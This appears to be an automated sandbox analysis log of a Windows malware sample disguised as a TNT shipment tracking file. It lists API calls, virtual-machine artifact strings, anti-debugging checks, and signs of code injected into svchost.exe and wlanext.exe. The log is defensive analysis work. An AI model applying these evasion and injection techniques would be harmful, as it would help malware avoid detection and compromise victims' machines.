          Source: C:\Windows\SysWOW64\wlanext.exe TID: 7892Thread sleep time: -19514000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be8M
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.3852590105.000000000888E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
          Source: explorer.exe, 00000003.00000002.3853190566.0000000008979000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00`
          Source: explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ata\Af7Nc
          Source: explorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
          Source: explorer.exe, 00000003.00000002.3851024498.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
          Source: explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-87269
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040ACF0 LdrLoadDll,2_2_0040ACF0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F3B6E0 mov eax, dword ptr fs:[00000030h]0_2_03F3B6E0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F39588 mov eax, dword ptr fs:[00000030h]0_2_03F39588
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F39528 mov eax, dword ptr fs:[00000030h]0_2_03F39528
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F3CD90 mov eax, dword ptr fs:[00000030h]0_2_03F3CD90
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_03F3CD30 mov eax, dword ptr fs:[00000030h]0_2_03F3CD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
